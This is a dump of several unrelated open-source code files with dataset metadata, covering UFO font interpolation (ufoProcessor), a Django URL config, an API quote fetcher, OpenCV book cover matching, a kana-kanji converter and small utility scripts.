getUFOVersion(ufoPath):\n # Peek into a ufo to read its format version. \n # <?xml version=\"1.0\" encoding=\"UTF-8\"?>\n # <!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n # <plist version=\"1.0\">\n # <dict>\n # <key>creator</key>\n # <string>org.robofab.ufoLib</string>\n # <key>formatVersion</key>\n # <integer>2</integer>\n # </dict>\n # </plist>\n metaInfoPath = os.path.join(ufoPath, u\"metainfo.plist\")\n p = plistlib.readPlist(metaInfoPath)\n return p.get('formatVersion')\n\n\ndef swapGlyphNames(font, oldName, newName, swapNameExtension = \"_______________swap\"):\n # In font swap the glyphs oldName and newName.\n # Also swap the names in components in order to preserve appearance.\n # Also swap the names in font groups. \n if not oldName in font or not newName in font:\n return None\n swapName = oldName + swapNameExtension\n # park the old glyph \n if not swapName in font:\n font.newGlyph(swapName)\n # swap the outlines\n font[swapName].clear()\n p = font[swapName].getPointPen()\n font[oldName].drawPoints(p)\n font[swapName].width = font[oldName].width\n # lib?\n font[oldName].clear()\n p = font[oldName].getPointPen()\n font[newName].drawPoints(p)\n font[oldName].width = font[newName].width\n \n font[newName].clear()\n p = font[newName].getPointPen()\n font[swapName].drawPoints(p)\n font[newName].width = font[swapName].width\n \n # remap the components\n for g in font:\n for c in g.components:\n if c.baseGlyph == oldName:\n c.baseGlyph = swapName\n continue\n for g in font:\n for c in g.components:\n if c.baseGlyph == newName:\n c.baseGlyph = oldName\n continue\n for g in font:\n for c in g.components:\n if c.baseGlyph == swapName:\n c.baseGlyph = newName\n \n # change the names in groups\n # the shapes will swap, that will invalidate the kerning\n # so the names need to swap in the kerning as well.\n newKerning = {}\n for first, second in font.kerning.keys():\n value = font.kerning[(first,second)]\n if first == oldName:\n first = newName\n elif first == newName:\n first = oldName\n if second == oldName:\n second = newName\n elif second == newName:\n second = oldName\n newKerning[(first, second)] = value\n font.kerning.clear()\n font.kerning.update(newKerning)\n \n for groupName, members in font.groups.items():\n newMembers = []\n for name in members:\n if name == oldName:\n newMembers.append(newName)\n elif name == newName:\n newMembers.append(oldName)\n else:\n newMembers.append(name)\n font.groups[groupName] = newMembers\n \n remove = []\n for g in font:\n if g.name.find(swapNameExtension)!=-1:\n remove.append(g.name)\n for r in remove:\n del font[r]\n\n\nclass DecomposePointPen(object):\n \n def __init__(self, glyphSet, outPointPen):\n self._glyphSet = glyphSet\n self._outPointPen = outPointPen\n self.beginPath = outPointPen.beginPath\n self.endPath = outPointPen.endPath\n self.addPoint = outPointPen.addPoint\n \n def addComponent(self, baseGlyphName, transformation):\n if baseGlyphName in self._glyphSet:\n baseGlyph = self._glyphSet[baseGlyphName]\n if transformation == _defaultTransformation:\n baseGlyph.drawPoints(self)\n else:\n transformPointPen = TransformPointPen(self, transformation)\n baseGlyph.drawPoints(transformPointPen)\n\n\n\nclass DesignSpaceProcessor(DesignSpaceDocument):\n \"\"\"\n A subclassed DesignSpaceDocument that can\n - process the document and generate finished UFOs with MutatorMath or varLib.model.\n - read and write documents\n - Replacement for the mutatorMath.ufo generator.\n \"\"\"\n\n fontClass = defcon.Font\n glyphClass = defcon.Glyph\n libClass = defcon.Lib\n glyphContourClass = defcon.Contour\n glyphPointClass = defcon.Point\n glyphComponentClass = defcon.Component\n glyphAnchorClass = defcon.Anchor\n kerningClass = defcon.Kerning\n groupsClass = defcon.Groups\n infoClass = defcon.Info\n featuresClass = defcon.Features\n\n mathInfoClass = MathInfo\n mathGlyphClass = MathGlyph\n mathKerningClass = MathKerning\n\n def __init__(self, readerClass=None, writerClass=None, fontClass=None, ufoVersion=3, useVarlib=False):\n super(DesignSpaceProcessor, self).__init__(readerClass=readerClass, writerClass=writerClass)\n\n self.ufoVersion = ufoVersion # target UFO version\n self.useVarlib = useVarlib\n self.roundGeometry = False\n self._glyphMutators = {}\n self._infoMutator = None\n self._kerningMutator = None\n self.fonts = {}\n self._fontsLoaded = False\n self.glyphNames = [] # list of all glyphnames\n self.processRules = True\n self.problems = [] # receptacle for problem notifications. Not big enough to break, but also not small enough to ignore.\n if readerClass is not None:\n print(\"ufoProcessor.ruleDescriptorClass\", readerClass.ruleDescriptorClass)\n\n def generateUFO(self, processRules=True):\n # makes the instances\n # option to execute the rules\n # make sure we're not trying to overwrite a newer UFO format\n self.loadFonts()\n self.findDefault()\n if self.default is None:\n # we need one to genenerate\n raise UFOProcessorError(\"Can't generate UFO from this designspace: no default font.\", self)\n v = 0\n for instanceDescriptor in self.instances:\n if instanceDescriptor.path is None:\n continue\n font = self.makeInstance(instanceDescriptor, processRules)\n folder = os.path.dirname(instanceDescriptor.path)\n path = instanceDescriptor.path\n if not os.path.exists(folder):\n os.makedirs(folder)\n if os.path.exists(path):\n existingUFOFormatVersion = getUFOVersion(path)\n if existingUFOFormatVersion > self.ufoVersion:\n self.problems.append(u\"Can’t overwrite existing UFO%d with UFO%d.\" % (existingUFOFormatVersion, self.ufoVersion))\n continue\n font.save(path, self.ufoVersion)\n self.problems.append(\"Generated %s as UFO%d\"%(os.path.basename(path), self.ufoVersion))\n return True\n\n def getSerializedAxes(self):\n return [a.serialize() for a in self.axes]\n\n def getMutatorAxes(self):\n d = collections.OrderedDict()\n\n for a in self.axes:\n d[a.name] = a.serialize()\n return d\n\n serializedAxes = property(getSerializedAxes, doc=\"a list of dicts with the axis values\")\n\n def getVariationModel(self, items, axes, bias=None):\n # Return either a mutatorMath or a varlib.model object for calculating. \n try:\n if self.useVarlib:\n # use the varlib variation model\n return dict(), VariationModelMutator(items, self.axes)\n else:\n # use mutatormath model\n axesForMutator = self.getMutatorAxes()\n return buildMutator(items, axes=axesForMutator, bias=bias)\n except:\n error = traceback.format_exc()\n self.problems.append(\"UFOProcessor.getVariationModel error: %s\" % error)\n return None\n\n def getInfoMutator(self):\n \"\"\" Returns a info mutator \"\"\"\n if self._infoMutator:\n return self._infoMutator\n infoItems = []\n for sourceDescriptor in self.sources:\n loc = sourceDescriptor.location\n sourceFont = self.fonts[sourceDescriptor.name]\n infoItems.append((loc, self.mathInfoClass(sourceFont)))\n bias, self._infoMutator = self.getVariationModel(infoItems, axes=self.serializedAxes, bias=self.defaultLoc)\n return self._infoMutator\n\n def getKerningMutator(self):\n \"\"\" Return a kerning mutator, collect the sources, build mathGlyphs. \"\"\"\n if self._kerningMutator:\n return self._kerningMutator\n kerningItems = []\n for sourceDescriptor in self.sources:\n loc = sourceDescriptor.location\n sourceFont = self.fonts[sourceDescriptor.name]\n # this makes assumptions about the groups of all sources being the same. \n kerningItems.append((loc, self.mathKerningClass(sourceFont.kerning, sourceFont.groups)))\n bias, self._kerningMutator = self.getVariationModel(kerningItems, axes=self.serializedAxes, bias=self.defaultLoc)\n return self._kerningMutator\n\n def getGlyphMutator(self, glyphName, decomposeComponents=False, fromCache=True):\n cacheKey = (glyphName, decomposeComponents)\n if cacheKey in self._glyphMutators and fromCache:\n return self._glyphMutators[cacheKey]\n items = self.collectMastersForGlyph(glyphName, decomposeComponents=decomposeComponents)\n new = []\n for a, b, c in items:\n if hasattr(b, \"toMathGlyph\"):\n new.append((a,b.toMathGlyph()))\n else:\n new.append((a,self.mathGlyphClass(b)))\n items = new\n bias, thing = self.getVariationModel(items, axes=self.serializedAxes, bias=self.defaultLoc)\n self._glyphMutators[cacheKey] = thing\n return thing\n\n def collectMastersForGlyph(self, glyphName, decomposeComponents=False):\n \"\"\" Return a glyph mutator.defaultLoc\n decomposeComponents = True causes the source glyphs to be decomposed first\n before building the mutator. That gives you instances that do not depend\n on a complete font. If you're calculating previews for instance.\n\n XXX check glyphs in layers\n \"\"\"\n items = []\n for sourceDescriptor in self.sources:\n loc = sourceDescriptor.location\n f = self.fonts[sourceDescriptor.name]\n sourceLayer = f\n if glyphName in sourceDescriptor.mutedGlyphNames:\n continue\n if not glyphName in f:\n # log this>\n continue\n layerName = \"foreground\"\n # handle source layers\n\n if sourceDescriptor.layerName is not None:\n # start looking for a layer\n if sourceDescriptor.layerName in f.layers:\n sourceLayer = f.layers[sourceDescriptor.layerName]\n layerName = sourceDescriptor.layerName\n # start looking for a glyph\n if glyphName not in sourceLayer:\n # this might be a support in a sparse layer\n # so we're skipping!\n #print(\"XXXX\", glyphName, \"not in\", sourceDescriptor.layerName)\n continue\n sourceGlyphObject = sourceLayer[glyphName]\n if decomposeComponents:\n # what about decomposing glyphs in a partial font?\n temp = self.glyphClass()\n p = temp.getPointPen()\n dpp = DecomposePointPen(sourceLayer, p)\n sourceGlyphObject.drawPoints(dpp)\n temp.width = sourceGlyphObject.width\n temp.name = sourceGlyphObject.name\n #temp.lib = sourceGlyphObject.lib\n processThis = temp\n else:\n processThis = sourceGlyphObject\n sourceInfo = dict(source=f.path, glyphName=glyphName, layerName=layerName, location=sourceDescriptor.location, sourceName=sourceDescriptor.name)\n if hasattr(processThis, \"toMathGlyph\"):\n processThis = processThis.toMathGlyph()\n else:\n processThis = self.mathGlyphClass(processThis)\n items.append((loc, processThis, sourceInfo))\n return items\n\n def getNeutralFont(self):\n # Return a font object for the neutral font\n # self.fonts[self.default.name] ?\n neutralLoc = self.newDefaultLocation()\n for sd in self.sources:\n if sd.location == neutralLoc:\n if sd.name in self.fonts:\n return self.fonts[sd.name]\n return None\n\n def loadFonts(self, reload=False):\n # Load the fonts and find the default candidate based on the info flag\n if self._fontsLoaded and not reload:\n return\n names = set()\n for sourceDescriptor in self.sources:\n if not sourceDescriptor.name in self.fonts:\n if os.path.exists(sourceDescriptor.path):\n self.fonts[sourceDescriptor.name] = self._instantiateFont(sourceDescriptor.path)\n self.problems.append(\"loaded master from %s, format %d\" % (sourceDescriptor.path, getUFOVersion(sourceDescriptor.path)))\n names = names | set(self.fonts[sourceDescriptor.name].keys())\n else:\n self.fonts[sourceDescriptor.name] = None\n self.problems.append(\"source ufo not found at %s\" % (sourceDescriptor.path))\n self.glyphNames = list(names)\n self._fontsLoaded = True\n\n def getFonts(self):\n # returnn a list of (font object, location) tuples\n fonts = []\n for sourceDescriptor in self.sources:\n f = self.fonts.get(sourceDescriptor.name)\n if f is not None:\n fonts.append((f, sourceDescriptor.location))\n return fonts\n\n def makeInstance(self, instanceDescriptor, doRules=False, glyphNames=None):\n \"\"\" Generate a font object for this instance \"\"\"\n font = self._instantiateFont(None)\n # make fonty things here\n loc = instanceDescriptor.location\n anisotropic = False\n locHorizontal = locVertical = loc\n if self.isAnisotropic(loc):\n anisotropic = True\n locHorizontal, locVertical = self.splitAnisotropic(loc)\n # groups\n if hasattr(self.fonts[self.default.name], \"kerningGroupConversionRenameMaps\"):\n renameMap = self.fonts[self.default.name].kerningGroupConversionRenameMaps\n else:\n renameMap = {}\n font.kerningGroupConversionRenameMaps = renameMap\n # make the kerning\n # this kerning is always horizontal. We can take the horizontal location\n if instanceDescriptor.kerning:\n try:\n kerningMutator = self.getKerningMutator()\n kerningObject = kerningMutator.makeInstance(locHorizontal)\n kerningObject.extractKerning(font)\n except:\n self.problems.append(\"Could not make kerning for %s. %s\" % (loc, traceback.format_exc()))\n # make the info\n try:\n infoMutator = self.getInfoMutator()\n if not anisotropic:\n infoInstanceObject = infoMutator.makeInstance(loc)\n else:\n horizontalInfoInstanceObject = infoMutator.makeInstance(locHorizontal)\n verticalInfoInstanceObject = infoMutator.makeInstance(locVertical)\n # merge them again\n infoInstanceObject = (1,0)*horizontalInfoInstanceObject + (0,1)*verticalInfoInstanceObject\n infoInstanceObject.extractInfo(font.info)\n font.info.familyName = instanceDescriptor.familyName\n font.info.styleName = instanceDescriptor.styleName\n font.info.postScriptFontName = instanceDescriptor.postScriptFontName\n font.info.styleMapFamilyName = instanceDescriptor.styleMapFamilyName\n font.info.styleMapStyleName = instanceDescriptor.styleMapStyleName\n # NEED SOME HELP WITH THIS\n # localised names need to go to the right openTypeNameRecords\n # records = []\n # nameID = 1\n # platformID = \n # for languageCode, name in instanceDescriptor.localisedStyleMapFamilyName.items():\n # # Name ID 1 (font family name) is found at the generic styleMapFamily attribute.\n # records.append((nameID, ))\n except:\n self.problems.append(\"Could not make fontinfo for %s. %s\" % (loc, traceback.format_exc()))\n for sourceDescriptor in self.sources:\n if sourceDescriptor.copyInfo:\n # this is the source\n self._copyFontInfo(self.fonts[sourceDescriptor.name].info, font.info)\n if sourceDescriptor.copyLib:\n # excplicitly copy the font.lib items\n for key, value in self.fonts[sourceDescriptor.name].lib.items():\n font.lib[key] = value\n if sourceDescriptor.copyFeatures:\n featuresText = self.fonts[sourceDescriptor.name].features.text\n if isinstance(featuresText, str):\n font.features.text = u\"\"+featuresText\n elif isinstance(featuresText, unicode):\n font.features.text = featuresText\n # glyphs\n if glyphNames:\n selectedGlyphNames = glyphNames\n else:\n selectedGlyphNames = self.glyphNames\n # add the glyphnames to the font.lib['public.glyphOrder']\n if not 'public.glyphOrder' in font.lib.keys():\n font.lib['public.glyphOrder'] = selectedGlyphNames\n for glyphName in selectedGlyphNames:\n try:\n glyphMutator = self.getGlyphMutator(glyphName)\n if glyphMutator is None:\n continue\n except:\n self.problems.append(\"Could not make mutator for glyph %s %s\" % (glyphName, traceback.format_exc()))\n continue\n if glyphName in instanceDescriptor.glyphs.keys():\n # XXX this should be able to go now that we have full rule support. \n # reminder: this is what the glyphData can look like\n # {'instanceLocation': {'custom': 0.0, 'weight': 824.0},\n # 'masters': [{'font': 'master.Adobe VF Prototype.Master_0.0',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 0.0, 'weight': 0.0}},\n # {'font': 'master.Adobe VF Prototype.Master_1.1',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 0.0, 'weight': 368.0}},\n # {'font': 'master.Adobe VF Prototype.Master_2.2',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 0.0, 'weight': 1000.0}},\n # {'font': 'master.Adobe VF Prototype.Master_3.3',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 100.0, 'weight': 1000.0}},\n # {'font': 'master.Adobe VF Prototype.Master_0.4',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 100.0, 'weight': 0.0}},\n # {'font': 'master.Adobe VF Prototype.Master_4.5',\n # 'glyphName': 'dollar.nostroke',\n # 'location': {'custom': 100.0, 'weight': 368.0}}],\n # 'unicodes': [36]}\n glyphData = instanceDescriptor.glyphs[glyphName]\n else:\n glyphData = {}\n font.newGlyph(glyphName)\n font[glyphName].clear()\n if glyphData.get('mute', False):\n # mute this glyph, skip\n continue\n glyphInstanceLocation = glyphData.get(\"instanceLocation\", instanceDescriptor.location)\n uniValues = []\n neutral = glyphMutator.get(())\n if neutral is not None:\n uniValues = neutral[0].unicodes\n glyphInstanceUnicodes = glyphData.get(\"unicodes\", uniValues)\n note = glyphData.get(\"note\")\n if note:\n font[glyphName] = note\n masters = glyphData.get(\"masters\", None)\n if masters:\n items = []\n for glyphMaster in masters:\n sourceGlyphFont = glyphMaster.get(\"font\")\n sourceGlyphName = glyphMaster.get(\"glyphName\", glyphName)\n m = self.fonts.get(sourceGlyphFont)\n if not sourceGlyphName in m:\n continue\n if hasattr(m[sourceGlyphName], \"toMathGlyph\"):\n sourceGlyph = m[sourceGlyphName].toMathGlyph()\n else:\n sourceGlyph = MathGlyph(m[sourceGlyphName])\n sourceGlyphLocation = glyphMaster.get(\"location\")\n items.append((sourceGlyphLocation, sourceGlyph))\n bias, glyphMutator = self.getVariationModel(items, axes=self.serializedAxes, bias=self.defaultLoc)\n try:\n if not self.isAnisotropic(glyphInstanceLocation):\n glyphInstanceObject = glyphMutator.makeInstance(glyphInstanceLocation)\n else:\n # split anisotropic location into horizontal and vertical components\n horizontal, vertical = self.splitAnisotropic(glyphInstanceLocation)\n horizontalGlyphInstanceObject = glyphMutator.makeInstance(horizontal)\n verticalGlyphInstanceObject = glyphMutator.makeInstance(vertical)\n # merge them again\n glyphInstanceObject = (0,1)*horizontalGlyphInstanceObject + (1,0)*verticalGlyphInstanceObject\n except IndexError:\n # alignment problem with the data?\n print(\"Error making instance %s\" % glyphName)\n continue\n font.newGlyph(glyphName)\n font[glyphName].clear()\n if self.roundGeometry:\n try:\n glyphInstanceObject = glyphInstanceObject.round()\n except AttributeError:\n pass\n try:\n glyphInstanceObject.extractGlyph(font[glyphName], onlyGeometry=True)\n except TypeError:\n # this causes ruled glyphs to end up in the wrong glyphname\n # but defcon2 objects don't support it\n pPen = font[glyphName].getPointPen()\n font[glyphName].clear()\n glyphInstanceObject.drawPoints(pPen)\n font[glyphName].width = glyphInstanceObject.width\n font[glyphName].unicodes = glyphInstanceUnicodes\n if doRules:\n resultNames = processRules(self.rules, loc, self.glyphNames)\n for oldName, newName in zip(self.glyphNames, resultNames):\n if oldName != newName:\n swapGlyphNames(font, oldName, newName)\n # copy the glyph lib?\n #for sourceDescriptor in self.sources:\n # if sourceDescriptor.copyLib:\n # pass\n # pass\n # store designspace location in the font.lib\n font.lib['designspace'] = list(instanceDescriptor.location.items())\n return font\n\n def isAnisotropic(self, location):\n for v in location.values():\n if type(v)==tuple:\n return True\n return False\n\n def splitAnisotropic(self, location):\n x = {}\n y = {}\n for dim, val in location.items():\n if type(val)==tuple:\n x[dim] = val[0]\n y[dim] = val[1]\n else:\n x[dim] = y[dim] = val\n return x, y\n\n def _instantiateFont(self, path):\n \"\"\" Return a instance of a font object with all the given subclasses\"\"\"\n try:\n return self.fontClass(path,\n libClass=self.libClass,\n kerningClass=self.kerningClass,\n groupsClass=self.groupsClass,\n infoClass=self.infoClass,\n featuresClass=self.featuresClass,\n glyphClass=self.glyphClass,\n glyphContourClass=self.glyphContourClass,\n glyphPointClass=self.glyphPointClass,\n glyphComponentClass=self.glyphComponentClass,\n glyphAnchorClass=self.glyphAnchorClass)\n except TypeError:\n # if our fontClass doesnt support all the additional classes\n return self.fontClass(path)\n\n def _copyFontInfo(self, sourceInfo, targetInfo):\n \"\"\" Copy the non-calculating fields from the source info.\"\"\"\n infoAttributes = [\n \"versionMajor\",\n \"versionMinor\",\n \"copyright\",\n \"trademark\",\n \"note\",\n \"openTypeGaspRangeRecords\",\n \"openTypeHeadCreated\",\n \"openTypeHeadFlags\",\n \"openTypeNameDesigner\",\n \"openTypeNameDesignerURL\",\n \"openTypeNameManufacturer\",\n \"openTypeNameManufacturerURL\",\n \"openTypeNameLicense\",\n \"openTypeNameLicenseURL\",\n \"openTypeNameVersion\",\n \"openTypeNameUniqueID\",\n \"openTypeNameDescription\",\n \"#openTypeNamePreferredFamilyName\",\n \"#openTypeNamePreferredSubfamilyName\",\n \"#openTypeNameCompatibleFullName\",\n \"openTypeNameSampleText\",\n \"openTypeNameWWSFamilyName\",\n \"openTypeNameWWSSubfamilyName\",\n \"openTypeNameRecords\",\n \"openTypeOS2Selection\",\n \"openTypeOS2VendorID\",\n \"openTypeOS2Panose\",\n \"openTypeOS2FamilyClass\",\n \"openTypeOS2UnicodeRanges\",\n \"openTypeOS2CodePageRanges\",\n \"openTypeOS2Type\",\n \"postscriptIsFixedPitch\",\n \"postscriptForceBold\",\n \"postscriptDefaultCharacter\",\n \"postscriptWindowsCharacterSet\"\n ]\n for infoAttribute in infoAttributes:\n copy = False\n if self.ufoVersion == 1 and infoAttribute in fontInfoAttributesVersion1:\n copy = True\n elif self.ufoVersion == 2 and infoAttribute in fontInfoAttributesVersion2:\n copy = True\n elif self.ufoVersion == 3 and infoAttribute in fontInfoAttributesVersion3:\n copy = True\n if copy:\n value = getattr(sourceInfo, infoAttribute)\n setattr(targetInfo, infoAttribute, value)\n\n\n","sub_path":"Lib/ufoProcessor/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":30065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"170672724","text":"from django.urls import path, include\nfrom . import views\n\nurlpatterns = [\n path('', views.catalog, name=\"catalog\"),\n path('accounts/', include('django.contrib.auth.urls')),\n path('register/', views.RegisterView.as_view()),\n path('logout/', views.LogoutView.as_view()),\n path('accounts/profile/', views.toHomepage),\n path('cart/', views.cart, name='cart'),\n path('orders/', views.orders, name='orders'),\n path('admission/', views.admission, name='admission'),\n path('admissions/', views.getAdmissions, name='admissions')\n]\n","sub_path":"students/y2335/laboratory_works/Dmitriev_Nikita/laboratory_work_1/shop/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"132093223","text":"\n\n\n\"\"\"\n请求一言\n\"\"\"\nimport requests\n\nfrom rover.common import is_json\n\n\n\"\"\"\n{\n \"id\": 3854,\n \"hitokoto\": \"忘羡一曲心系君,瀚海百重长相忆。\",\n \"type\": \"d\",\n \"from\": \"魔道祖师\",\n \"creator\": \"我養你啊_\",\n \"created_at\": \"1537446304\"\n}\n\"\"\"\n\n\ndef request_one_word():\n base_url = \"https://international.v1.hitokoto.cn/\"\n try:\n resp = requests.get(base_url)\n if resp.status_code == 200 and is_json(resp):\n resp = resp.json()\n hitokoto = resp.get(\"hitokoto\")\n creator = resp.get(\"creator\")\n return hitokoto\n except Exception as e:\n print(\"获取一言失败!\")\n print(e)\n return None\n","sub_path":"aphorisms/requestOneWord.py","file_name":"requestOneWord.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"103741097","text":"import torch.nn.functional as F\nimport numpy as np\nimport random\n\n\ndef test_classification(net, test_data, test_targets):\n patterns = []\n\n for i in range(10):\n patterns.append(test_data[np.where(test_targets == i)[0][4]])\n\n true = 0\n to_test = [random.randint(0, 9999) for i in range(50)]\n for test_idx in to_test:\n\n distances = []\n img0 = test_data[test_idx].unsqueeze(0)\n true_label = test_targets[test_idx]\n\n for i in range(10):\n img1 = patterns[i].unsqueeze(0)\n img0, img1 = img0.cuda(), img1.cuda()\n\n output_f0 = net(img0)\n output_f1 = net(img1)\n\n euclidean_distance = F.pairwise_distance(output_f0, output_f1)\n distances.append(euclidean_distance[0])\n min_idx = np.argmin(distances)\n if min_idx == true_label:\n true += 1\n print('Accuracy: {}'.format(true / len(to_test)))\n","sub_path":"classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"542668934","text":"from Russian_Flash_Cards import *\n\nclass NoSingleWords():\n\n NSW_Deck = []\n Pause = 10\n\n def __init__(self):\n pass\n\n def play_audio(self):\n pass\n\n def play_deck(self, Deck):\n if len(Deck) < 1:\n print(\"\\nDeck complete!!\\n\")\n else:\n r = randint(0, len(Deck)-1)\n\n #\n # STILL NEED TO ADD FORMATING AND SUCH\n #\n\n # PRINT RU\n print(colored(Deck[r][1], \"green\"))\n sleep(self.Pause)\n\n # PRINT ANSWER\n print(colored(Deck[r][2], \"yellow\"))\n print(colored(Deck[r][3], \"blue\"))\n if Deck[r][5] != \"False\":\n print(colored(Deck[r][5], \"white\"))\n if Deck[r][6] != \"False\":\n print(colored(Deck[r][6], \"red\"))\n\n\n # GET ANSWER\n answer = input(str(\"Did you get this right? \"))\n\n del Deck[r]\n if len(Deck) > 0:\n print(\"\\nCards left: \" + str(len(Deck)) +\"\\n\")\n self.play_deck(Deck)\n\n def build_deck(self):\n self.NSW_Deck = [] # To make sure it is empty!\n conn = mysql.connector.connect(**config)\n cur = conn.cursor()\n query = \"SELECT * FROM ru_words WHERE active='1'\"\n cur.execute(str(query))\n for i in cur:\n if i[7] in sentence_cats:\n self.NSW_Deck.append(i)\n cur.close()\n conn.close()\n\n def run(self):\n #Build Deck\n self.build_deck()\n print(\"\\n\")\n self.play_deck(self.NSW_Deck)\n\n\"\"\"\na = NoSingleWords()\na.run()\n\"\"\"","sub_path":"libs/No_Single_Words.py","file_name":"No_Single_Words.py","file_ext":"py","file_size_in_byte":1599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"294011549","text":"from utilities.coverdescriptor import CoverDescriptor\nfrom utilities.covermatcher import CoverMatcher\nimport glob\nimport csv\nimport cv2\nimport ntpath\n\n\n# Define paths\ndatabase_path = 'books.csv'\ncovers_path = 'covers'\nquery_path = 'queries/query01.png'\n\n# Initialize the default parameters using BRISK is being used\nuse_sift = False\nuse_hamming = True\nratio = 0.7\nmin_matches = 40\n\n# Initialize the database dictionary of covers\ndatabase = {}\n\n# Loop over the database\nfor l in csv.reader(open(database_path)):\n\t# Update the database using the image ID as the key\n\tdatabase[l[0]] = l[1:]\n\n# If SIFT is to be used, then update the parameters\nif use_sift:\n\tmin_matches = 50\n\n# Initialize the cover descriptor and cover matcher\ncover_descriptor = CoverDescriptor(use_sift=use_sift)\ncover_matcher = CoverMatcher(cover_descriptor, glob.glob(covers_path + \"/*.png\"), ratio=ratio, min_matches=min_matches,\n\t\t\t\t\t\t\t use_hamming=use_hamming)\n\n# Load the query image, convert it to greyscale, and extract keypoints and descriptors\nquery_image = cv2.imread(query_path)\ngray = cv2.cvtColor(query_image, cv2.COLOR_BGR2GRAY)\n(query_keypoints, query_descriptors) = cover_descriptor.describe(gray)\n\n# Try to match the book cover to a known database of images\nresults = cover_matcher.search(query_keypoints, query_descriptors)\n\n# Show the query cover\ncv2.imshow(\"Query\", query_image)\n\n# Check to see if no results were found\nif len(results) == 0:\n\tprint(\"A match could not be found for that cover!\")\n\tcv2.waitKey(0)\n# Otherwise, matches were found\nelse:\n\t# Loop over the results\n\tfor (i, (score, cover_path)) in enumerate(results):\n\t\t# Grab the book information\n\t\t(author, title) = database[ntpath.basename(cover_path)]\n\t\tprint(\"{}. {:.2f}% : {} - {}\".format(i+1, score*100, author, title))\n\n\t\t# Load the result image and show it\n\t\tresult = cv2.imread(cover_path)\n\t\tcv2.imshow(\"Result\", result)\n\t\tcv2.waitKey(0)\n","sub_path":"practical_python-opencv_cases_studies/amazon_cover_search/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"453053512","text":"from collections import defaultdict\nimport math\n\n\nV = 10**6\nlambda1 = 0.95\nwith open('tm.txt') as model_file:\n transition = defaultdict(list)\n emission = defaultdict(list)\n possible_tags = dict()\n for line in model_file:\n tag, context, word, prob = line.strip().split()\n possible_tags[context] = 1\n if tag == \"E\":\n transition[word].append( [context, float(prob)])\n else:\n pass\n # transition[context +\" \"+ word] = float(prob)\n emission = dict(emission)\n# print(emission)\n#exit()\nlm_file = open('lm.txt').readlines()\nemission = defaultdict(lambda: .000001)\nfor line in lm_file:\n try:\n context, word, prob = line.strip().split()\n emission[context +\" \"+ word] = float(prob)\n except:\n pass\n\nwith open('../../data/wiki-ja-test.pron') as text:\n for line in text:\n line = line.strip()\n l = len(line)\n best_score = defaultdict(lambda :defaultdict(float))\n best_edge = defaultdict(dict)\n best_score[0][\"<s>\"] = 0\n best_edge[0][\"<s>\"] = 'NULL'\n for end in range(1,len(line) + 1):\n for begin in range(end):\n pron = line[begin:end]\n my_tm = transition.get(pron, [])\n if my_tm == [] and len(pron) == 1:\n my_tm.append([pron,.000001])\n for curr_word, tm_prob in my_tm:\n for prev_word, prev_score in best_score[begin].items():\n curr_score = prev_score - math.log(tm_prob * emission[prev_word +\" \"+ curr_word])\n\n if curr_word not in best_score[end] or curr_score < best_score[end][curr_word]:\n best_score[end][curr_word] = curr_score\n best_edge[end][curr_word] = (begin, prev_word)\n # process eos\n curr_word = \"</s>\"\n end = len(line) + 1\n begin = len(line)\n for prev_word, prev_score in best_score[begin].items():\n curr_score = prev_score -math.log(tm_prob * emission[pron +\" \"+ word])\n if curr_word not in best_score[end] or curr_score < best_score[end][curr_word]:\n best_score[end][curr_word] = curr_score\n best_edge[end][curr_word] = (begin, prev_word)\n\n # back_ward\n tags = []\n next_edge = best_edge[end][curr_word]\n while next_edge != (0, \"<s>\"):\n\n position, tag = next_edge\n tags.append(tag)\n next_edge = best_edge[position][tag]\n tags.reverse()\n print(\" \".join(tags)) \n\n","sub_path":"arai/tutorial14/kkc.py","file_name":"kkc.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"88974675","text":"# Author Toshihiko Aoki\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"for Bert pre-training input feature file\"\"\"\n\nfrom mptb import PretrainDataGeneration\n\n\nif __name__ == '__main__':\n generator = PretrainDataGeneration(\n dataset_path='data/jawiki_norm.txt',\n# dataset_path='tests/sample_text.txt',\n output_path='tests/sample_text',\n vocab_path='data/32023.vocab',\n sp_model_path='data/32023.model',\n max_pos=512,\n epochs=1,\n tokenizer_name='sp_pos'\n )\n generator.generate()\n","sub_path":"create_pretrain_file.py","file_name":"create_pretrain_file.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444936965","text":"#Pedro Gallino\n#12/7/17\n#palindrome.py - checks for the palindromes\n\ndictionary = open('engmix.txt')\n\nfor word in dictionary:\n word = word.strip()\n x = list(word)\n x.reverse()\n if x == list(word):\n print(word)\n 